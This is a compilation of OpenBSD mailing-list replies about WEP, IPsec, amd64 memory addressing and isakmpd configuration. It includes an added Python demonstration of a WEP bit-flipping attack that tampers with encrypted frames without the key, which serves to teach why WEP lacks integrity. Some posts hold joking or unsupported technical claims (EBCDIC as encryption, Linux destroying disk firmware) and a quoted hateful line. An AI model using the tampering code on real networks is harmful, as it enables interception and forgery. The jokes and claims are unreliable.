Re: OpenBSD in the webcomic XKCD
Salut,

On Mon, Nov 26, 2007 at 04:49:20PM +0100, David Vasek wrote:
> The Lynx displays only 'alt', not 'title', texts. Old Netscape Navigators

That behavior is actually correct since title= is for annotations to the image while alt= is for the case when the image cannot at all be displayed.

(I'm sure that's not really OpenBSD related though.)

Tonnerre
Re: securing OpenBSD wireless network
Salut,

On Mon, Nov 19, 2007 at 07:59:17AM -0800, David Newman wrote:
> OpenBSD supports WEP. Does it even matter?

Well, if you want to prevent someone from accidentally connecting to your network, yes. WEP keys can be captured in less than one minute:

http://eprint.iacr.org/2007/120.pdf
http://tapir.cs.ucl.ac.uk/bittau-wep.pdf

> WEP is certainly better than nothing if all you have is older hardware that doesn't support WPA/WPA2, but that's about all. If your APs and host adapters support WPA, use it, not WEP.

Think of WEP as an encoding. Just like all the others: ASCII, UTF-8, DES[1], MD5, etc. They do not provide any security, as opposed to encryption algorithms, such as AES, Twofish, EBCDIC, et cetera. ;-)

Personally, I use IPsec to secure my WLAN, and I can only recommend that to others. It is very effective.

Tonnerre

[1]: It's called Data Encoding Standard, after all ;-)
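The remark above that WEP is "an encoding" can be made concrete. The Python script below is an added example, not code from the original post, from the cited papers or from OpenBSD: it implements WEP's per-frame construction (RC4 keyed with IV || key, XORed over data || CRC-32 ICV) and the classic message-modification attack, in which an attacker who never learns the key flips chosen plaintext bits and repairs the ICV so that the receiver still accepts the frame. The key, IV and HTTP payload are constructed sample values, the frame is reduced to IV || ciphertext (no 802.11 headers or key index byte), and the ICV byte order is assumed little-endian. The key-recovery attacks in the two papers linked above are a separate weakness that this script does not demonstrate.

```python
"""WEP message-modification demo: flip plaintext bits, fix the ICV, no key needed.

WEP protects a frame body as RC4(IV || key) XOR (data || CRC32(data)).
CRC-32 is affine, so crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros_of_same_length).
An attacker who sees a frame can therefore XOR a chosen delta into the data
and the matching correction into the ICV; the receiver's check still passes.
All key, IV and payload bytes below are constructed sample values.
"""
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Return `length` keystream bytes of RC4 for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the data (little-endian assumed)."""
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Sender: return IV || RC4(IV || key) XOR (data || ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    body = data + icv(data)
    return iv + xor(rc4(iv + key, len(body)), body)


def wep_decrypt(key: bytes, frame: bytes):
    """Receiver: return the data if the ICV verifies, else None."""
    iv, ct = frame[:3], frame[3:]
    body = xor(rc4(iv + key, len(ct)), ct)
    data, tag = body[:-4], body[-4:]
    return data if icv(data) == tag else None


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker: XOR `delta` into the hidden plaintext without knowing the key.

    `delta` is zero-padded to the data length. Flipping ciphertext bits flips
    the same plaintext bits; the ICV is repaired by XOR-ing in
    crc(delta) ^ crc(zeros), which is what CRC-32 linearity predicts.
    """
    iv, ct = frame[:3], frame[3:]
    data_len = len(ct) - 4
    delta = delta.ljust(data_len, b"\x00")
    icv_fix = xor(icv(delta), icv(bytes(data_len)))
    return iv + xor(ct, delta + icv_fix)


def tamper_demo() -> bytes:
    """Constructed scenario: turn 'acct=1000' into 'acct=9999' inside an encrypted request."""
    key = bytes.fromhex("0102030405")          # sample 40-bit WEP key
    iv = b"\x01\x02\x03"                       # sample IV
    data = b"GET /balance?acct=1000 HTTP/1.0"  # constructed plaintext
    frame = wep_encrypt(key, iv, data)
    # The attacker knows (or guesses) the plaintext layout, not the key.
    delta = bytearray(len(data))
    off = data.index(b"1000")                  # offset of the field to rewrite
    delta[off] = ord("1") ^ ord("9")
    delta[off + 1:off + 4] = bytes([ord("0") ^ ord("9")]) * 3
    return wep_decrypt(key, flip_bits(frame, bytes(delta)))


if __name__ == "__main__":
    print(tamper_demo())   # the receiver accepts the rewritten request
```

The point is the check in wep_decrypt: it passes on the tampered frame although the attacker touched neither the key nor the keystream. A keyed MAC (as in WPA's Michael, or better a CCMP/AES-based tag) instead of a CRC is what closes this hole, which is also why running IPsec on top of the link, as suggested above, buys real integrity protection where WEP does not.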
Re: securing OpenBSD wireless network
Salut,

On Mon, Nov 19, 2007 at 02:20:54PM -0800, David Newman wrote:
> There is some layer-2 stuff that happens before layer-3 handshaking begins -- 802.11 association and deassociation, possibly layer-2 learning, and 802.1X authentication if that's used. IPSec will not and cannot secure any of this.

Is there any need to secure that?

In my local WLAN, you only have two ways of proceeding if you want internet access: a Tor router, or IPsec. If you come in without IPsec, i.e. you cannot establish the IKE handshake, and if you don't use the Socks proxy Tor provides, you are trapped in a local network where no one except all of the laptops are. Sure thing, you can communicate with another unauthenticated laptop, but I don't care that much about this scenario, since it does not cause me any problems.

> Wireless LANs are a technology in which sensitive data may go in the clear at L2 before L3 gets started. In this case L2 security mechanisms such as WPA are appropriate, and do not rule out the use of complementary mechanisms like IPSec or SSL.

What sensitive data do you see me exchange before IPsec connectivity is established?

> Even if you don't care about authenticating or encrypting L2 data, there's still the issue of bandwidth and resource consumption at L2. 802.11 is extremely chatty. Using WPA or (if you must) WEP to keep the airwaves free (well, to the extent possible) can help there.

With a, that's not that much of a problem usually

Tonnerre
Re: linux kills laptop hard drive... how does obsd behave?
Salut,

On Sat, Oct 27, 2007 at 11:34:27AM +0200, Adliger Martinez von der Unterschicht wrote:
> Now, a friend of mine has found a big problem:
>
> http://www.linux-hero.com/rant/explanation-ubuntu-hard-drive-wear-and-tear
> https://bugs.launchpad.net/ubuntu/+bug/59695
> https://bugs.launchpad.net/ubuntu/+bug/104535

Actually, Linux has a far worse bug in terms of hard disks, which has been introduced in kernel version 1.3.26 or something in that order. Under some circumstances, it overwrites the hard disk's firmware. Mostly this happens in a state where the OS can't really function too well anymore anyway, so you can only reboot. However, a hard disk with a bogus firmware will behave as a brick, leaving you without a chance to fix the situation.

I have a couple of hard disks here which I use to keep paper from flying away when I write letters; those have been Linux'd. It happens rarely, but it does happen.

Tonnerre
Re: linux kills laptop hard drive... how does obsd behave?
Salut,

On Sat, Oct 27, 2007 at 12:14:49PM -0500, bofh wrote:
> I'm really curious, I've never heard of a HD firmware killing bug in linux since 1.3.x. I used to spend a lot of time following linux in the 1.2 1.3 kernel times and don't recall hearing about that bug.

Well, that was when I first noticed it. It is a bit hard to track in the mess that Linux is, but it still exists in the 2.6 series: a 2.6.20 kernel Linux'd yet another hard disk of mine a couple of weeks ago.

Tonnerre
Re: linux kills laptop hard drive... how does obsd behave?
Salut,

On Sat, Oct 27, 2007 at 12:38:55PM -0500, Todd Alan Smith wrote:
> What exactly were the symptoms of your drive being linux'd?

It tries to imitate a brick as closely as possible.

> Also, I'm wondering if this discussion shouldn't be taken off-list, since it's really about Linux, not OpenBSD.

Well, the entire thread was started as Linux killing hard disks, wasn't it?

Tonnerre
Re: Google employment opportunity
Salut,

On Sun, Oct 14, 2007 at 08:47:45AM +0100, Craig Skinner wrote:
> [I hate jews]

Could someone please enlighten me how this is OpenBSD related?

Tonnerre
Re: Get developers some big machines to support more RAM
Salut,

On Mon, Oct 08, 2007 at 09:44:48AM +, mickey wrote:
> > PAE is slow and has hairy paws. I am glad that we have real amd64 machines now so we don't need it anymore.
>
> besides that what do you think amd64 runs? (: it uses the same pae as i386. and it is not any faster. learn what are you talking about...

No, it uses 48-bit addresses and some flag bits, but it can use a 64-bit selector rather than two 32-bit ones, improving the performance significantly.

Please also note that PAE only has 36-bit addresses, allowing for up to 64GB of RAM, while AMD64 allows for 256TB, theoretically.

Well, s/RAM/address space/

Tonnerre
Re: Get developers some big machines to support more RAM
Salut,

On Mon, Oct 08, 2007 at 10:02:22AM +, mickey wrote:
> or what you think loading 36bit physaddr is slower than loading 48bits?

I think that loading 48-bits in one step is faster than loading 36-bit in two. It is also a matter of experience that amd64 memory access is way faster than i386 with PAE.

i386 is dying out finally, that's what I meant to say. amd64 has been elected as the architecture of the future by most if not all hardware producers. We got rid of one of the worst pieces of hardware ever, at least partially. This is why I suggested that it might be less of an issue to most people. For a good reason: nowadays, you just get an amd64 and don't have the problem.

Tonnerre
Re: Get developers some big machines to support more RAM
Salut,

On Mon, Oct 08, 2007 at 11:15:27AM +, mickey wrote:
> > I think that loading 48-bits in one step is faster than loading 36-bit in two. It is also a matter of experience that amd64 memory access is way faster than i386 with PAE.
>
> why do you think that tlb loader cannot load 64bits in one step in i386 mode either?

I'm talking long mode here.

> > For a good reason: nowadays, you just get an amd64 and don't have the problem.
>
> lots of amd64 machines have much of their own stability problems. it is as well a different architecture that requires recompiling software that may or may not be 64bit clean. of course running your favourite irc client would not matter...

The software should be migrated, and it is happening. Why BitchX doesn't work on amd64 is not my problem. Also, most software problems can be resolved by compiling the software with something that is not gcc.

Tonnerre
Re: comics and recurring donations Was: Show your appreciation and get your 4.2 DVD
Salut,

On Fri, Sep 07, 2007 at 01:17:03PM -0500, Craig Brozefsky wrote:
> OpenBSD has made me rethink my relationship to alot of projects (open source and political) I am involved with, in a positive way. It made me realize that these projects need funding to get things done and I should contribute what I can myself as opposed to assuming someone else will do it.

I think it is a very important aspect to understand that no one will do your work for you in a reasonable timeframe in a project that you will find respectable. Your best chances to get new things in or bugs fixed is to send a PR along with a patch to the developers; but from time to time not even that will do it.

Good that you realized it, though. I think that people who did are the force which is driving Open Source.

Tonnerre
Re: filesystems?
Salut,

On Tue, Sep 04, 2007 at 01:10:14PM +0200, Eric Elena wrote:
> No I didn't. Is it so fun? :)

Oh yes. By the way, I must say that for additional fun, the directory names were A, B, C, ..., Y, Z. Gives you quite something to search for.

Tonnerre
Re: filesystems?
Salut,

On Mon, Sep 03, 2007 at 08:46:37AM +0300, Ihar Hrachyshka wrote:
> Also you can use ext2(3) filesystem for this purpose: BSD works quite OK with it (though with no journal support), Linux - ow, do you think it's not?:) - and there are some tools in the Internet to be able to read ext2 from Windows. Don't know about writing: you need to investigate it by yourself.

The same goes for ffs/ufs

Tonnerre
Re: filesystems?
Salut,

On Mon, Sep 03, 2007 at 05:10:57PM +0200, Eric Elena wrote:
> I think fat32 is a good choice: you have nothing to install.

Did you ever have to debug a deep directory structure where something caused all directories to become files? On a 500G disk? Fun.

Tonnerre
Re: That whole Linux stealing our code thing
Salut,

On Sun, Sep 02, 2007 at 12:42:14PM +0100, Rui Miguel Silva Seabra wrote:
> Likewise, if you don't like the GPL, don't let it be a choice for other users. If your problem is that people don't give back, go knock on certain vendors who profit from OpenSSH without contributing anything back. Oh wait... they don't have to, have they? :)

They wouldn't, even if we asked them to. They would do it once and switch to some incompatible Cisco SSH which only works with PuTTY. The goal we have reached with everyone using OpenSSH is that they are actually interoperable with the rest of the SSH world.

You cannot convince vendors to be more open by forcing them in the way the GPL people do; this will only drive them into the hands of the other commercial providers. Nothing has boosted the spread of VxWorks like the GPL violations project.

Tonnerre
Re: bge0: watchdog timeout
Salut,

On Wed, Aug 29, 2007 at 02:23:04PM -0700, Tom Bombadil wrote:
> So, basically all we can do is just avoid the 5704s, right?

Well, I can't tell you for 100% if it is that bug or a simple driver problem. It's just the symptoms which I know very well from prior experiences with 5704/5705 based cards. (And the acknowledgement of the bug from Broadcom.)

> Another question then... The new HP hardware we are getting comes with embedded BCM5708s (bnx). Does this NIC have any problem we should know about?

Well, the jamming DMA controller is a 5704/5705 specific problem as far as I know. I am running on a BCM5753M, and everything is working well. We also have BCM5721 which is running well and BCM5705_2 which is crappy as hell.

Tonnerre
Re: Is Theo still hiking ????
Salut,

On Mon, Jan 29, 2007 at 10:45:08AM +0100, Claudio Jeker wrote:
> Note: the OpenBSD routing table does not do that.

It's hard to do hardware accelerated FIBs without the hardware, isn't it?

> While IPv6 has a static header size it uses header stacking and so every router has to do the same stupid header parsing that needs tons of special logic.

If you need to look at them at all, that is. For simple end-to-end routing, this is not required.

Tonnerre
Re: Is Theo still hiking ????
Salut,

On Sun, Jan 28, 2007 at 12:26:11PM +0100, Almir Karic wrote:
> they said the SAME thing about ipv4 :/

The big problems of IPv4 aren't address space problems but performance problems. There are two big issues:

1. Deaggregation. A lot of small nets clog up the pipe which don't have to be announced separately when distributed appropriately. Solution: give every customer so many IPs that he'll never have to come back for more.

2. Routing header parsing. IPv4 uses variable length headers, which involves more overhead than IPv6, which puts extensions into the extension header, so the routing header parsing involves no special logic.

> 65536 x the total number of possible 48-bit MAC addresses. irrelevant.

Not exactly. By default, IPv6 gives you 65535 subnets with 18446744073709551615 possible IPs each. There aren't many companies on this planet who operate more than 65'000 sites (as in factories, buildings, whatever).

You don't believe me? Write a small script which pings every IPv4 address on the Internet. The result is: there aren't all that many of them occupied, and there are even entirely vacant class A networks. However, the majority of them are heavily fragmented, which is the real problem.

Tonnerre
Re: Friendly registrar
Salut,

On Sun, Jan 14, 2007 at 09:55:16PM +0100, Nico Meijer wrote:
> I like GoDaddy. They're on donations.html.

On the other hand, they're known for their Windows business.

We chose Gandi for controversial web sites (like ffii.org) because they tend not to shut down the delegation whenever they receive a preliminary injunction. For any kind of Open Source movement, this might become crucial in the future...

Tonnerre
Re: pkg_add -r -F update
Salut,

On Tue, Dec 05, 2006 at 10:13:38AM +0100, Karel Kulhavy wrote:
> pkg_add transcode-1.0.2p0.tgz says
>
> Collision: the following files already exist
>
> some with same md5, some with different
>
> pkg_add -r update transcode-1.0.2p0.tgz should replace the package according to the manpage. It doesn't - prints the same error. The manpage further says use -F update to force the replacement. When I use pkg_add -r -F update transcode-1.0.2p0.tgz, I get the same errors.
>
> Why doesn't pkg_add do what's written in the manpage?

Well, it does. There is just no installed package owning the file. You should rather force it to overwrite files, not packages.

Which file is it anyway?

Tonnerre
Re: Bug in ksh // Improvement for tar ?
Salut,

On Mon, Dec 04, 2006 at 11:45:46PM -0501, Dan Brosemer wrote:
> Take a look at the way /etc/rc does stuff like this:
>
> [EMAIL PROTECTED]:ttyp1[~]$ if [ x$demo == x-n -o x$demo == x-e ]; then
> echo bar
> fi
> bar

Sure, but this is a workaround. It is a bug that ought to be fixed. (Even though it is admittedly a very old bug and a lot of people are using the workaround.)

Tonnerre
Re: strange behaviour of gre(4) tunnel
Salut,

On Wed, Nov 22, 2006 at 08:52:11PM +0500, Igor Goldenberg wrote:
> 20:28:38.627914 0:4:23:ce:bb:b4 0:16:cb:a2:8e:c5 0800 122: gre 192.50.51.52 > 192.50.51.28: [] 192.168.254.254 > 192.168.254.253: icmp: echo request (id:bd53 seq:44) (ttl 255, id 3713, len 84) (DF) (ttl 64, id 26235, len 108)

Did you set net.inet.gre.allow to 1?

Tonnerre
Re: AMD dual core, deciding factors for a platform?
Salut,

On Thu, Nov 16, 2006 at 05:38:58PM +0200, turha turha wrote:
> I'm about to build a new box, and thought I'd ask first if there's any experience with AMD's dual core processors (AM2 or s939). From what I've read both socket types work as amd64, with bsd and bsd.mp, right? Any thoughts on which works more stable and faster, i386 vs amd64 arch, and the benefits of using bsd.mp? What chipsets/MoBos work well? So mainly I'm interested in comments from people who have tested these, to see if it's worth the trouble (money) to get dual core for openbsd, is there much of an improvement, etc.

I tried 3.9 on a Sun Fire X2100 with a dual core Opteron 146 a while ago, but OpenBSD only worked every other boot. On some boots, it would just crash and on the next boot it would do a fsck and then crash and one more reboot later, it would come up with a corrupt boot sector. :/

Tonnerre
More IPsec configuration problems
Salut,

I have another problem with IPsec (using isakmpd). I used almost the example config, but depending on the target, I get packet loss in different amounts:

* 10.16.1.131 to 10.1.2.9, for example, always stalls when trying to fetch web sites via https
* 10.16.1.131 to 10.1.4.111 works well though, however, SSH connections tend to stand still after a couple of minutes, and get reset
* 10.16.1.131 to 10.1.2.4 gives me sudden hangs when creating a lot of traffic

Any idea what setting might cause this? When pinging through the VPN, I get the following statistics:

1 packets transmitted, 9967 packets received, 0% packet loss
round-trip min/avg/max/stddev = 20.135/24.896/176.564/11.385 ms

This doesn't seem very lossy, but it is actually enough to let some TCP connections stall, it seems.

Looking at the logs, I used to see the following in pre-4.0 OpenBSD versions:

Nov 13 14:53:46 rtsyg01 isakmpd[1447]: message_recv: invalid cookie(s) 5ca7897d133e5c6e 5edcdaaa3ed541a9
Nov 13 14:53:46 rtsyg01 isakmpd[1447]: dropped message from 213.189.149.229 port 500 due to notification type INVALID_COOKIE

But it seems that these messages disappeared as well. Now, there is no note in the logs to why the packet loss occurs at all.

Ideas?

Tonnerre
Re: More IPsec configuration problems
Salut,

Config: see http://marc.theaimsgroup.com/?l=openbsd-misc&m=116336496801052

Tonnerre
OpenBSD isakmpd connectivity problem (or misunderstanding?)
Salut,

I have a problem with direct connection of two servers using IPsec. The IKE key exchange always comes up, but then it seems that both the routing and the encryption go entirely wrong.

The hosts exchange their internal addresses (10.16.1.1 and 10.1.1.1) as ID tokens for phase 2. However, if I try to ping 10.16.1.1 from 10.1.1.1, the packets go out the external interface - unencrypted.

If, however, I replace the ID tokens with the corresponding IP subnets (10.16.0.0/16 and 10.1.0.0/16), I get an even more weird effect:

* 10.16.0.0/16 can communicate with 10.1.0.0/16 just fine
* 10.1.0.0/16 can communicate with 10.16.0.0/16 just as well
* 10.16.1.1 cannot reach 10.1.0.0/16, however, people in 10.1.0.0/16 can connect to 10.16.1.1 just fine
* 10.1.1.1 cannot reach 10.16.0.0/16, however, people in 10.16.0.0/16 can connect to 10.1.1.1 just fine

[EMAIL PROTECTED] cat /etc/isakmpd/isakmpd.conf

    [General]
    Default-phase-1-lifetime=   120,60:3600
    Default-phase-2-lifetime=   120,60:3600
    Retransmits=                5
    Check-interval=             5
    Exchange-max-time=          120
    Listen-on=                  external_ip_address_of_wg
    Policy-File=                /etc/isakmpd/isakmpd.policy

    [Phase 1]
    external_ip_address_of_sygroup= ISAKMP-peer-sygroup

    [Phase 2]
    Connections=                IPsec-wg-sygroup

    [ISAKMP-peer-sygroup]
    Phase=                      1
    Transport=                  udp
    Local-address=              external_ip_address_of_wg
    Address=                    external_ip_address_of_sygroup

    [IPsec-wg-sygroup]
    Phase=                      2
    ISAKMP-peer=                ISAKMP-peer-sygroup
    Configuration=              Default-quick-mode
    Local-ID=                   Net-wg
    Remote-ID=                  Net-sygroup

    [Net-wg]
    ID-type=                    IPV4_ADDR_SUBNET
    Network=                    10.16.0.0
    Netmask=                    255.255.0.0

    [Net-sygroup]
    ID-type=                    IPV4_ADDR_SUBNET
    Network=                    10.1.0.0
    Netmask=                    255.255.0.0

    # Quick mode description
    [Default-quick-mode]
    EXCHANGE_TYPE=              QUICK_MODE
    Suites=                     QM-ESP-TWOFISH-SHA-PFS-SUITE

[EMAIL PROTECTED] cat /etc/isakmpd/isakmpd.conf

    [General]
    Default-phase-1-lifetime=   120,60:3600
    Default-phase-2-lifetime=   120,60:3600
    Retransmits=                5
    Check-interval=             5
    Exchange-max-time=          120
    Listen-on=                  external_ip_of_sygroup
    Policy-File=                /etc/isakmpd/isakmpd.policy

    [Phase 1]
    external_ip_of_wg=          ISAKMP-peer-wg

    [Phase 2]
    Connections=                IPsec-sygroup-wg

    [ISAKMP-peer-wg]
    Phase=                      1
    Transport=                  udp
    Local-address=              external_ip_of_sygroup
    Address=                    external_ip_of_wg

    [IPsec-sygroup-wg]
    Phase=                      2
    ISAKMP-peer=                ISAKMP-peer-wg
    Configuration=              Default-quick-mode
    Local-ID=                   Net-sygroup
    Remote-ID=                  Net-wg

    [Net-wg]
    ID-type=                    IPV4_ADDR_SUBNET
    Network=                    10.16.0.0
    Netmask=                    255.255.0.0

    [Net-sygroup]
    ID-type=                    IPV4_ADDR_SUBNET
    Network=                    10.1.0.0
    Netmask=                    255.255.0.0

    # Quick mode description
    [Default-quick-mode]
    EXCHANGE_TYPE=              QUICK_MODE
    Suites=                     QM-ESP-BLF-SHA-PFS-SUITE

(This is the config where the clients can actually connect to each other. If I replace the Network= with Address= and set ID-type to IPV4_ADDR, the two routers still can't connect to each other, but neither can the clients.)

The point of the whole exercise is that I have a lot of IPsec nodes and should propagate their routes using some routing protocol.

Any ideas on how to make the two routers talk to each other?

Tonnerre
Re: OpenBSD isakmpd connectivity problem (or misunderstanding?)
Salut,

On Sun, Nov 12, 2006 at 10:24:23PM +0100, Ralph Gessner wrote:
> You really do a ping -I 10.1.1.1 10.16.1.1 or only a ping 10.16.1.1? You must have the 10.1.1.1 as source ip. A normal ping on the gateway uses the external ip as source!

Yes, this one works so far. However, how would one configure this statically? Is there any way other than

route add -host 10.1.1.1 10.16.1.1

?

> Sound like the same problem :)

I imagined.

Tonnerre
Re: openbsd on cisco hardware?
Salut,

On Mon, Nov 13, 2006 at 02:04:20PM +1100, Craig Barraclough wrote:
> Someone correct me if I'm wrong
>
> Last time I had a look, the platform was essentially a PII, with fxp NICs and a PCI (or was it ISA?) flash card for the OS.

Most Cisco hardware I'm aware of is either MIPS or PowerPC based.

Tonnerre